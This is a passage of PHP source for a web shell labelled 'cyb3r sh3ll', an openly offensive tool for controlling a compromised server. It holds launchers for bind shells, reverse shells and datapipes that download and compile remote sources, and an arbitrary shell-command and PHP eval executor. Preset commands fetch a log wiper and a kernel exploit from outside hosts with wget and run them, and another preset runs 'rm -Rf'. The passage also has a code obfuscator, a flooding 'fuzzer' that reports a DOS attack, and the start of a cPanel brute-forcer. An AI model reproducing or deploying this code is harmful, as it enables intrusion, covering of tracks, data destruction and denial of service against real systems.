  5337. fputs($ser,$domain);
  5338. echo "<pre>";
  5339. while(!feof($ser))echo fgets($ser);
  5340. echo "</pre>";
  5341. fclose($ser);
  5342. }
  5343. else{
  5344. echo "<center><table width=\"50%\">Whois:<form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
  5345. }
  5346. }
  5347.  
  5348.  
  5349.  
  5350. if ($act == "cracker")
  5351. {
  5352.  echo "
  5353. <br><center>
  5354. <a href=\"".$surl."act=hash\" >Hash</a><font color='silver'> -|- </font>
  5355. <a href=\"".$surl."act=smtp\" >SMTP</a><font color='silver'> -|- </font>
  5356. <a href=\"".$surl."act=pop3\" >POP3</a><font color='silver'> -|- </font>
  5357. <a href=\"".$surl."act=imap\" >IMAP</a><font color='silver'> -|- </font>
  5358. <a href=\"".$surl."act=ftp\" >FTP</a><font color='silver'> -|- </font>
  5359. <a href=\"".$surl."act=snmp\" >SNMP</a><font color='silver'> -|- </font>
  5360. <a href=\"".$surl."act=mysql\" >MySQL</a><font color='silver'> -|- </font>
  5361. <a href=\"".$surl."act=htmlform\" >HTTP Form</a><font color='silver'> -|- </font>
  5362. <a href=\"".$surl."act=basicauth\" >HTTP Auth(basic)</a><font color='silver'> -|- </font>
  5363. <a href=\"".$surl."act=cpanel\" >CPANEL</a><font color='silver'> -|- </font>
  5364. <a href=\"".$surl."act=dic\" >Dictionary Maker</a>
  5365. </center><br>";
  5366. }
  5367.  
  5368. if ($act == "shells")
  5369. { ?>
  5370. <TABLE style="BORDER-COLLAPSE: collapse; borderColor=#c0c0c0" cellSpacing=0 cellPadding=5 width="100%"  border=1>
  5371.      <tr> <!-- 1 -->
  5372.        <td valign="top" width="50%" ><p align="center"><b>(: Bind/Reverse Shell :)</b></p></td>
  5373.        <td valign="top" ><p align="center"><b>[: Web Shell :]</b></p></td>
  5374.      
  5375.      </tr>
  5376.      <tr><!-- 2 -->
  5377.          <td valign="top" ><center>
  5378.             <?php
  5379.  
  5380.  $bndportsrcs = array(
  5381.  
  5382.   "cyb3r_bindport.pl"=>array("Using PERL","perl %path %port"),
  5383.  
  5384.   "cyb3r_bindport.c"=>array("Using C","%path %port %pass")
  5385.  
  5386.  );
  5387.  
  5388.  $bcsrcs = array(
  5389.  
  5390.   "cyb3r_backconn.pl"=>array("Using PERL","perl %path %host %port"),
  5391.  
  5392.   "cyb3r_backconn.c"=>array("Using C","%path %host %port")
  5393.  
  5394.  );
  5395.  
  5396.  $dpsrcs = array(
  5397.  
  5398.   "cyb3r_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
  5399.  
  5400.   "cyb3r_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
  5401.  
  5402.  );
  5403.  
  5404.  if (!is_array($bind)) {$bind = array();}
  5405.  
  5406.  if (!is_array($bc)) {$bc = array();}
  5407.  
  5408.  if (!is_array($datapipe)) {$datapipe = array();}
  5409.  
  5410.  
  5411.  
  5412.  if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
  5413.  
  5414.  if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
  5415.  
  5416.  
  5417.  
  5418.  if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
  5419.  
  5420.  if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
  5421.  
  5422.  
  5423.  
  5424.  if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
  5425.  
  5426.  if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
  5427.  
  5428.  if (!empty($bindsubmit))
  5429.  
  5430.  {
  5431.  
  5432.   echo "<b>Result of binding port:</b><br>";
  5433.  
  5434.   $v = $bndportsrcs[$bind["src"]];
  5435.  
  5436.   if (empty($v)) {echo "Unknown file!<br>";}
  5437.  
  5438.   elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  5439.  
  5440.   else
  5441.  
  5442.   {
  5443.  
  5444.    $w = explode(".",$bind["src"]);
  5445.  
  5446.    $ext = $w[count($w)-1];
  5447.  
  5448.    unset($w[count($w)-1]);
  5449.  
  5450.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  5451.  
  5452.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  5453.  
  5454.    if ($ext == "pl") {$binpath = $srcpath;}
  5455.  
  5456.    @unlink($srcpath);
  5457.  
  5458.    $fp = fopen($srcpath,"ab+");
  5459.  
  5460.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  5461.  
  5462.    elseif (!$data = ghost_source($bind["src"])) {echo "Can't download sources!";}
  5463.  
  5464.    else
  5465.  
  5466.    {
  5467.  
  5468.     fwrite($fp,$data,strlen($data));
  5469.  
  5470.     fclose($fp);
  5471.  
  5472.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
  5473.  
  5474.     $v[1] = str_replace("%path",$binpath,$v[1]);
  5475.  
  5476.     $v[1] = str_replace("%port",$bind["port"],$v[1]);
  5477.  
  5478.     $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
  5479.  
  5480.     $v[1] = str_replace("//","/",$v[1]);
  5481.  
  5482.     $retbind = myshellexec($v[1]." > /dev/null &");
  5483.  
  5484.     sleep(5);
  5485.  
  5486.     $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
  5487.  
  5488.     if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
  5489.  
  5490.     else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
  5491.  
  5492.    }
  5493.  
  5494.    echo "<br>";
  5495.  
  5496.   }
  5497.  
  5498.  }
  5499.  
  5500.  if (!empty($bcsubmit))
  5501.  
  5502.  {
  5503.  
  5504.   echo "<b>Result of back connection:</b><br>";
  5505.  
  5506.   $v = $bcsrcs[$bc["src"]];
  5507.  
  5508.   if (empty($v)) {echo "Unknown file!<br>";}
  5509.  
  5510.   else
  5511.  
  5512.   {
  5513.  
  5514.    $w = explode(".",$bc["src"]);
  5515.  
  5516.    $ext = $w[count($w)-1];
  5517.  
  5518.    unset($w[count($w)-1]);
  5519.  
  5520.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  5521.  
  5522.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  5523.  
  5524.    if ($ext == "pl") {$binpath = $srcpath;}
  5525.  
  5526.    @unlink($srcpath);
  5527.  
  5528.    $fp = fopen($srcpath,"ab+");
  5529.  
  5530.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  5531.  
  5532.    elseif (!$data = ghost_source($bc["src"])) {echo "Can't download sources!";}
  5533.  
  5534.    else
  5535.  
  5536.    {
  5537.  
  5538.     fwrite($fp,$data,strlen($data));
  5539.  
  5540.     fclose($fp);
  5541.  
  5542.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  5543.  
  5544.     $v[1] = str_replace("%path",$binpath,$v[1]);
  5545.  
  5546.     $v[1] = str_replace("%host",$bc["host"],$v[1]);
  5547.  
  5548.     $v[1] = str_replace("%port",$bc["port"],$v[1]);
  5549.  
  5550.     $v[1] = str_replace("//","/",$v[1]);
  5551.  
  5552.     $retbind = myshellexec($v[1]." > /dev/null &");
  5553.  
  5554.     echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
  5555.  
  5556.    }
  5557.  
  5558.   }
  5559.  
  5560.  }
  5561.  
  5562.  if (!empty($dpsubmit))
  5563.  
  5564.  {
  5565.  
  5566.   echo "<b>Result of datapipe-running:</b><br>";
  5567.  
  5568.   $v = $dpsrcs[$datapipe["src"]];
  5569.  
  5570.   if (empty($v)) {echo "Unknown file!<br>";}
  5571.  
  5572.   elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
  5573.  
  5574.   else
  5575.  
  5576.   {
  5577.  
  5578.    $srcpath = $tmpdir.$datapipe["src"];
  5579.  
  5580.    $w = explode(".",$datapipe["src"]);
  5581.  
  5582.    $ext = $w[count($w)-1];
  5583.  
  5584.    unset($w[count($w)-1]);
  5585.  
  5586.    $srcpath = join(".",$w).".".rand(0,999).".".$ext;
  5587.  
  5588.    $binpath = $tmpdir.join(".",$w).rand(0,999);
  5589.  
  5590.    if ($ext == "pl") {$binpath = $srcpath;}
  5591.  
  5592.    @unlink($srcpath);
  5593.  
  5594.    $fp = fopen($srcpath,"ab+");
  5595.  
  5596.    if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
  5597.  
  5598.    elseif (!$data = ghost_source($datapipe["src"])) {echo "Can't download sources!";}
  5599.  
  5600.    else
  5601.  
  5602.    {
  5603.  
  5604.     fwrite($fp,$data,strlen($data));
  5605.  
  5606.     fclose($fp);
  5607.  
  5608.     if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
  5609.  
  5610.     list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
  5611.  
  5612.     $v[1] = str_replace("%path",$binpath,$v[1]);
  5613.  
  5614.     $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
  5615.  
  5616.     $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
  5617.  
  5618.     $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
  5619.  
  5620.     $v[1] = str_replace("//","/",$v[1]);
  5621.  
  5622.     $retbind = myshellexec($v[1]." > /dev/null &");
  5623.  
  5624.     sleep(5);
  5625.  
  5626.     $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
  5627.  
  5628.     if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
  5629.  
  5630.     else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
  5631.  
  5632.    }
  5633.  
  5634.    echo "<br>";
  5635.  
  5636.   }
  5637.  
  5638.  }
  5639.  
  5640.  ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
  5641.  
  5642.  foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  5643.  
  5644.  ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
  5645.  
  5646. <b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
  5647.  
  5648. foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  5649.  
  5650. ?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
  5651.  
  5652. Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
  5653.  
  5654. <b>Datapipe:</b><br>
  5655. <form action="<?php echo $surl; ?>">
  5656. <input type=hidden name=act value=shells><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
  5657.  
  5658. foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
  5659.  
  5660. ?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.
  5661.  
  5662.  
  5663.  
  5664.        
  5665.          </center></td>
  5666.        
  5667.          <td ><center>
  5668.          <p align="center"><b>[: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Enter Command to Execute:</b></a> :]</b>
  5669.          
  5670. <form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></p><br>
  5671. <div align="center">Useful Commands   </div>
  5672.  
  5673.  
  5674.     <form action="<?php echo $surl; ?>">
  5675.  
  5676.       <div align="center">
  5677.  
  5678.         <input type=hidden name=act value="cmd">
  5679.  
  5680.         <input type=hidden name="d" value="<?php echo $dispd; ?>">
  5681.  
  5682.           <SELECT NAME="cmd">
  5683.  
  5684.             <OPTION VALUE="uname -a">Kernel version</option>
  5685.  
  5686.               <OPTION VALUE="w">Logged in users</option>
  5687.  
  5688.                 <OPTION VALUE="lastlog">Last to connect</option>
  5689.  
  5690.                   <OPTION VALUE="find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null">Suid bins</option>
  5691.  
  5692.                     <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!</option>
  5693.  
  5694.                     <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?</option>
  5695.  
  5696.                     <OPTION VALUE="which wget curl w3m lynx">Downloaders?</option>
  5697.  
  5698.                     <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO</option>
  5699.  
  5700.                     <OPTION VALUE="netstat -atup | grep IST">Open ports</option>
  5701.  
  5702.                     <OPTION VALUE="locate gcc">gcc installed?</option>
  5703.  
  5704.                     <OPTION VALUE="rm -Rf">Format box (DANGEROUS)</option>
  5705.  
  5706.                     <OPTION VALUE="wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)</option>
  5707.  
  5708.                     <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2</option>
  5709.  
  5710.                     <OPTION VALUE="./zap2">WIPELOGS PT3</option>
  5711.  
  5712.                     <OPTION VALUE="wget http://ftp.powernet.com.tr/supermail/debug/k3">Kernel attack (Krad.c) PT1 (If wget installed)</option>
  5713.  
  5714.                     <OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)</option>
  5715.  
  5716.                     <OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)</option>
  5717.  
  5718.                     <OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)</option>
  5719.  
  5720.                     <OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)</option>
  5721.  
  5722.                     <OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)</option>
  5723.  
  5724.                   </SELECT>
  5725.  
  5726.         <input type=hidden name="cmd_txt" value="1">
  5727.  
  5728.         &nbsp;
  5729.  
  5730.         <input type=submit name=submit value="Execute">
  5731.  
  5732.           <br>
  5733.  
  5734.         Warning. Kernel may be alerted using higher levels </div>
  5735.  
  5736.     </form>
  5737.  
  5738.          </center>
  5739.          </td>
  5740.            
  5741.      </tr>
  5742.      
  5743.  </table><?php
  5744.  
  5745. }
  5746.  
  5747. if ($act == "cmd")
  5748.  
  5749. {
  5750.  
  5751. if (trim($cmd) == "ps -aux") {$act = "processes";}
  5752.  
  5753. elseif (trim($cmd) == "tasklist") {$act = "processes";}
  5754.  
  5755. else
  5756.  
  5757. {
  5758.  
  5759.  @chdir($chdir);
  5760.  
  5761.  if (!empty($submit))
  5762.  
  5763.  {
  5764.  
  5765.   echo "<b>Result of execution this command</b>:<br>";
  5766.  
  5767.   $olddir = realpath(".");
  5768.  
  5769.   @chdir($d);
  5770.  
  5771.   $ret = myshellexec($cmd);
  5772.  
  5773.   $ret = convert_cyr_string($ret,"d","w");
  5774.  
  5775.   if ($cmd_txt)
  5776.  
  5777.   {
  5778.  
  5779.    $rows = count(explode("\r\n",$ret))+1;
  5780.  
  5781.    if ($rows < 10) {$rows = 10;}
  5782.  
  5783.    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  5784.  
  5785.   }
  5786.  
  5787.   else {echo $ret."<br>";}
  5788.  
  5789.   @chdir($olddir);
  5790.  
  5791.  }
  5792.  
  5793.  else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
  5794.  
  5795.  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  5796.  
  5797. }
  5798.  
  5799. }
  5800.  
  5801. if ($act == "phpcode")
  5802. {
  5803.  echo "
  5804. <br><center>
  5805. <a href=\"".$surl."act=eval\" >PHP Code Evaluate</a><font color='silver'> -|- </font>
  5806. <a href=\"".$surl."act=masscode\" >Mass Code Injector</a><font color='silver'> -|- </font>
  5807. <a href=\"".$surl."act=obfuscate\" >PHP Obfuscator</a><font color='silver'> -|- </font>
  5808. <a href=\"".$surl."act=fuzzer\" >Web Server Fuzzer</a>
  5809. </center><br>";
  5810. }
  5811.  
  5812. if ($act == "eval")
  5813.  
  5814. {
  5815.  
  5816.  if (!empty($eval))
  5817.  
  5818.  {
  5819.  
  5820.   echo "<b>Result of execution this PHP-code</b>:<br>";
  5821.  
  5822.   $tmp = ob_get_contents();
  5823.  
  5824.   $olddir = realpath(".");
  5825.  
  5826.   @chdir($d);
  5827.  
  5828.   if ($tmp)
  5829.  
  5830.   {
  5831.  
  5832.    ob_clean();
  5833.  
  5834.    eval($eval);
  5835.  
  5836.    $ret = ob_get_contents();
  5837.  
  5838.    $ret = convert_cyr_string($ret,"d","w");
  5839.  
  5840.    ob_clean();
  5841.  
  5842.    echo $tmp;
  5843.  
  5844.    if ($eval_txt)
  5845.  
  5846.    {
  5847.  
  5848.     $rows = count(explode("\r\n",$ret))+1;
  5849.  
  5850.     if ($rows < 10) {$rows = 10;}
  5851.  
  5852.     echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  5853.  
  5854.    }
  5855.  
  5856.    else {echo $ret."<br>";}
  5857.  
  5858.   }
  5859.  
  5860.   else
  5861.  
  5862.   {
  5863.  
  5864.    if ($eval_txt)
  5865.  
  5866.    {
  5867.  
  5868.     echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  5869.  
  5870.     eval($eval);
  5871.  
  5872.     echo "</textarea>";
  5873.  
  5874.    }
  5875.  
  5876.    else {echo $ret;}
  5877.  
  5878.   }
  5879.  
  5880.   @chdir($olddir);
  5881.  
  5882.  }
  5883.  
  5884.  else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
  5885.  
  5886.  echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
  5887.  
  5888. }
  5889.  
  5890. if ($act == "proxy")
  5891. {
  5892. global $errorbox,$et,$footer,$hcwd;
  5893. echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" width=\"100%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Navigator: </b><input type=text name=urL size=140 value=\""; if(!!empty($_REQUEST['urL'])) echo "http://www.edpsciences.org/htbin/ipaddress"; else echo htmlspecialchars($_REQUEST['urL']);echo "\">$hcwd<input type=submit class=buttons value=Go></td></tr></form></table>";
  5894. if (!empty($_REQUEST['urL'])){
  5895. $dir="";
  5896. $u=parse_url($_REQUEST['urL']);
  5897. $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/';
  5898. if(substr_count($file,'/')>1)$dir=substr($file,0,(strpos($file,'/')));
  5899. $url=@fsockopen($host, 80, $errno, $errstr, 12);
  5900. if(!$url)die("<br>$errorbox Can not connect to host!$et$footer");
  5901. fputs($url, "GET /$file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n");
  5902. while(!feof($url)){
  5903. $con = fgets($url);
  5904. $con = str_replace("href=mailto","HrEf=mailto",$con);
  5905. $con = str_replace("HREF=mailto","HrEf=mailto",$con);
  5906. $con = str_replace("href=\"mailto","HrEf=\"mailto",$con);
  5907. $con = str_replace("HREF=\"mailto","HrEf=\"mailto",$con);
  5908. $con = str_replace("href=\'mailto","HrEf=\"mailto",$con);
  5909. $con = str_replace("HREF=\'mailto","HrEf=\"mailto",$con);
  5910. $con = str_replace("href=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  5911. $con = str_replace("HREF=\"http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  5912. $con = str_replace("href=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  5913. $con = str_replace("HREF=\'http","HrEf=\"".hlinK("seC=px&urL=http"),$con);
  5914. $con = str_replace("href=http","HrEf=".hlinK("seC=px&urL=http"),$con);
  5915. $con = str_replace("HREF=http","HrEf=".hlinK("seC=px&urL=http"),$con);
  5916. $con = str_replace("href=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5917. $con = str_replace("HREF=\"","HrEf=\"".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5918. $con = str_replace("href=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5919. $con = str_replace("HREF=\"","HrEf=\'".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5920. $con = str_replace("href=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5921. $con = str_replace("HREF=","HrEf=".hlinK("seC=px&urL=http://$host/$dir/"),$con);
  5922. echo $con;
  5923. }
  5924. fclose($url);
  5925. }
  5926. }
  5927.  
  5928.  
  5929. if ($act == "obfuscate")
  5930. {
  5931.   if ( isset($_POST['code']) &&
  5932.                $_POST['code'] != '')
  5933.     {
  5934.         $encoded = base64_encode(gzdeflate(trim(stripslashes($_POST['code'].' '),'<?php,?>'),9)); // high Compression! :P
  5935.         $encode = '
  5936. <?php
  5937. $encoded = \''.$encoded.'\';
  5938. eval(gzinflate(base64_decode($encoded)));
  5939. // Encoded by Gh0st-Killer.
  5940. ?>
  5941. ';
  5942.     }
  5943.     else
  5944.     {
  5945.         $encode = 'Please Enter your Code! and Click Submit! :)';    
  5946.     }?>
  5947.     <form method="POST">
  5948.         <textarea cols="100" rows="20" name="code"><?php echo $encode;?></textarea><br />
  5949.         <input style="margin: 20px; margin-left: 50px; padding: 10px;"  class="own"  type="submit" value="Encode :D"/>
  5950.     </form>
  5951.     <?php
  5952. }
  5953.  
  5954. if ($act == "fuzzer")
  5955. {
  5956.     if(isset($_POST['ip']) &&
  5957.     isset($_POST['port']) &&
  5958.     isset($_POST['times']) &&
  5959.     isset($_POST['time']) &&
  5960.     isset($_POST['message']) &&
  5961.     isset($_POST['messageMultiplier']) &&
  5962.     $_POST['message'] != "" &&
  5963.     $_POST['time'] != "" &&
  5964.     $_POST['times'] != "" &&
  5965.     $_POST['port'] != "" &&
  5966.     $_POST['ip'] != "" &&
  5967.     $_POST['messageMultiplier'] != ""
  5968.     )
  5969.     {
  5970.        $IP=$_POST['ip'];
  5971.        $port=$_POST['port'];
  5972.        $times = $_POST['times'];
  5973.        $timeout = $_POST['time'];
  5974.        $send = 0;
  5975.        $ending = "";
  5976.        $multiplier = $_POST['messageMultiplier'];
  5977.        $data = "";
  5978.        $mode="tcp";
  5979.        $data .= "POST /";
  5980.        $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
  5981.         if($_POST['type'] == "tcp")
  5982.         {
  5983.             $mode = "tcp";
  5984.         }
  5985.         while($multiplier--)
  5986.         {
  5987.             $data .= urlencode($_POST['message']);
  5988.         }
  5989.         $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
  5990.         $data .= "by-cyb3r-sh3ll".$ending;
  5991.         $length = strlen($data);
  5992.        
  5993.        
  5994.        echo "Sending Data :- <br /> <p align='center'>$data</p>";
  5995.        
  5996.        print "cyb3r sh3ll is at its Work now :D ;D! Dont close this window untill you recieve a message <br>";
  5997.        for($i=0;$i<$times;$i++)
  5998.        {
  5999.             $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
  6000.             if($socket)
  6001.             {
  6002.                 fwrite($socket , $data , $length );
  6003.                 fclose($socket);
  6004.             }
  6005.         }
  6006.         echo "<script>alert('Fuzzing Completed!');</script>";
  6007.         echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
  6008.         echo "Total Number of Packets Sent : " . $times . "<br />";
  6009.         echo "Total Data Sent = ". showsizE($times*$length) . "<br />";
  6010.         echo "Data per packet = " . showsizE($length) . "<br />";
  6011.     }
  6012.     else
  6013.     {
  6014.         ?>
  6015.         <form method="POST">
  6016.             <input type="hidden" name="fuzz" />
  6017.             <table id="margins">
  6018.                 <tr>
  6019.                     <td width="400" class="title">
  6020.                         IP
  6021.                     </td>
  6022.                     <td>
  6023.                         <input class="cmd" name="ip" value="127.0.0.1" onfocus="if(this.value == '127.0.0.1')this.value = '';" onblur="if(this.value=='')this.value='127.0.0.1';"/>
  6024.                     </td>
  6025.                 </tr>
  6026.                
  6027.                 <tr>
  6028.                     <td class="title">
  6029.                         Port
  6030.                     </td>
  6031.                     <td>
  6032.                         <input class="cmd" name="port" value="80" onfocus="if(this.value == '80')this.value = '';" onblur="if(this.value=='')this.value='80';"/>
  6033.                     </td>
  6034.                 </tr>
  6035.                
  6036.                 <tr>
  6037.                     <td class="title">
  6038.                         Timeout
  6039.                     </td>
  6040.                     <td>
  6041.                         <input type="text" name="time" value="5" onfocus="if(this.value == '5')this.value = '';" onblur="if(this.value=='')this.value='5';"/>
  6042.                     </td>
  6043.                 </tr>
  6044.                
  6045.                
  6046.                 <tr>
  6047.                     <td class="title">
  6048.                         No of times
  6049.                     </td>
  6050.                     <td>
  6051.                         <input type="text" class="cmd" name="times" value="100" onfocus="if(this.value == '100')this.value = '';" onblur="if(this.value=='')this.value='100';" />
  6052.                     </td>
  6053.                 </tr>
  6054.                
  6055.                 <tr>
  6056.                     <td class="title">
  6057.                         Message <font color="red">(The message Should be long and it will be multiplied with the value after it)</font>
  6058.                     </td>
  6059.                     <td>
  6060.                         <input class="cmd" name="message" value="%S%x--Some Garbage here --%x%S" onfocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onblur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
  6061.                     </td>
  6062.                     <td>
  6063.                         x
  6064.                     </td>
  6065.                     <td width="20">
  6066.                         <input style="width: 30px;" name="messageMultiplier" value="10" />
  6067.                     </td>
  6068.                 </tr>
  6069.                
  6070.                 <tr>
  6071.                     <td rowspan="2">
  6072.                         <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="submit" class="own" value="Let it be! :D"/>
  6073.                     </td>
  6074.                 </tr>
  6075.             </table>            
  6076.         </form>
  6077.         <?php
  6078.     }
  6079. }
  6080.  
  6081. if ($act == "cpanel")
  6082. {
  6083. $cpanel_port="2082";
  6084. $connect_timeout=5;
  6085. set_time_limit(0);
  6086. $submit=$_REQUEST['submit'];
  6087. $users=$_REQUEST['users'];
  6088. $pass=$_REQUEST['passwords'];
  6089. $target=$_REQUEST['target'];
  6090. $cracktype=$_REQUEST['cracktype'];
  6091. if($target == ""){
  6092. $target = "localhost";
  6093. }
  6094. $charset=$_REQUEST['charset'];
